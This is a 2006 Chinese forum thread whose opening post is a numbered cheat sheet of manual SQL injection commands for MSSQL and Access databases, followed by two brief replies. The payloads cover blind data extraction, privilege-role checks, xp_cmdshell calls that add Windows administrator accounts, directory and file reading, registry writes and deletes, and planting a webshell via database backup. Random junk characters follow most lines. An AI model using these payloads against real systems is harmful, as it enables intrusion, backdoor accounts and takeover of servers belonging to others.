社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3992阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2  >Uw:cq  
  2.初步判断是否是mssql ;and user>0 hzo> :U  
h} `v0E  
  3.注入参数是字符'and [查询条件] and ''=' l =E86"m  
A7% d  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' lU{)%4e`  
n9B5D:.G  
  5.判断数据库系统 fpR|+`k  
PVIOe}N  
  ;and (select count(*) from sysobjects)>0 mssql ,<v0(  
O] @E8<?^  
  ;and (select count(*) from msysobjects)>0 access j'D%eQI,V  
WXy8<?s  
~*HQPp?v  
w"j>^#8  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 8A#,*@V[  
~CNB3r5R  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @G4Z  
], lLD UZ\  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 C%z)D1-  
#`VAw ) eV  
  9.(1)猜字段的ascii值(access) ;z'&$#pA  
8ymdg\I+L  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 BJjic%V  
B[N]=V  
  (2)猜字段的ascii值(mssql) ~/L:$  
(!* l+}  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 *ERV\/  
"t0^4=c+7  
  10.测试权限结构(mssql) J :O!4gI  
cYA:k  
e$[O J<t  
, Y:oTo=~  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ,Kv6!ib6Q  
wW%b~JX  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- $|~ <6A{y  
uj8saNu  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 287j,'vR  
^B<-.(F  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 4fi4F1f  
mkSu $c  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- A (2 0+  
90vWqL!  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ZFtx&vr P  
T8S&9BM7  
  ;and 1=(select IS_MEMBER('db_owner'));-- 1aAOT6h  
~O}r<PQ  
D_l$"35?  
2j-l<!s  
  11.添加mssql和系统的帐户 A%^?z.  
ctP+ECH  
  ;exec master.dbo.sp_addlogin username;-- n9Fq^^?  
  ;exec master.dbo.sp_password null,username,password;-- k-~}KlP  
f Fi=/}  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Xh8U}w<k6  
SoziFI  
  ;exec master.dbo.xp_cmdshell 'net user username password G<CD 4:V  
fEBi'Ad  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- %r^tZ;; l  
.#&)%}GC  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- tj;47UtH  
G#%Sokkb'  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- & DP"RWT/  
Oe Q[-e  
-HF?1c  
k6#$Nb606  
  12.(1)遍历目录 v?He]e'  
jkk%zu  
  ;create table dirs(paths varchar(100), id int) zZMKgFR@  
(dg,w*t'  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' <WUgH6"  
PhAfEsD  
  ;and (select top 1 paths from dirs)>0 jRsl/dmy  
|b\a)1Po:  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) z};|.N}  
ja9u?UbW  
]!TE  
bPTtA;u  
  (2)遍历目录 -|V#U`mwF  
H,D5)1Uu  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- JZ}zXv   
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Q&I #  
Uh0g !zzp  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 }XUL\6U  
wqG#jC!5  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &k'<xW?x  
,u}wW*?,sT  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 + E{[j  
ozY$}|sjDT  
H^'%$F?Ss  
G&h@  
  13.mssql中的存储过程 F:jNv3W1  
+(!/(2>~  
  xp_regenumvalues 注册表根键, 子键 uihH")Mo  
OG{*:1EP  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 =Htt'""DN  
y{M7kYWtHV  
  xp_regread 根键,子键,键值名 r 1HG$^  
Kb ]}p  
  ;exec xp_regread ,~3rY,y-  
"`;-5dg  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 !Ge;f/@  
S:{xx`6K  
  xp_regwrite 根键,子键, 值名, 值类型, 值 4V9BmVS|Th  
;8<HB1 &,  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 oLkzLJ  
g{Av =66Z  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 T @^ S:K  
%f<>Kwr`2  
  xp_regdeletevalue 根键,子键,值名 2=?3MXcjy  
Gd|kAC g  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 e;v"d!H/  
U`[viH>K  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 _p"u~j~%-  
8pEA3py  
`Hw][qy#  
[.&JQ  
  14.mssql的backup创建webshell r], %:imGr  
g(zeOS]q}  
  use model yf*'=q  
RR=WD-l  
  create table cmd(str image); bj`GGxzOb  
iuj%.}  
  insert into cmd(str) values (''); Rk5#5R n  
-0xo6'mD  
  backup database model to disk='c:\l.asp'; kB?/_a`]  
1>[#./@  
ktPM66`b  
z4 =OR@ h  
  15.mssql内置函数 sf$hsPC^  
Y;R,ph.a  
  ;and (select @@version)>0 获得Windows的版本号 GPni%P#a@0  
ts<\n-f  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa rV\G/)xL  
}8AH/  
  ;and (select user_name())>0 爆当前系统的连接用户 kxJs4BY0  
GH':Yk  
  ;and (select db_name())>0 得到当前连接的数据库 5=*i!c _m  
<#8}![3Q  
+UWv}|  
'C}ku>B_r  
  16.简洁的webshell Jqzw94  
2ih}?%H8  
  use model Y'000#+  
:ek^M (  
  create table cmd(str image); $S' TW3  
[^GBg>k  
  insert into cmd(str) values (''); &3IkC(yD  
sCJ|U6Q-  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八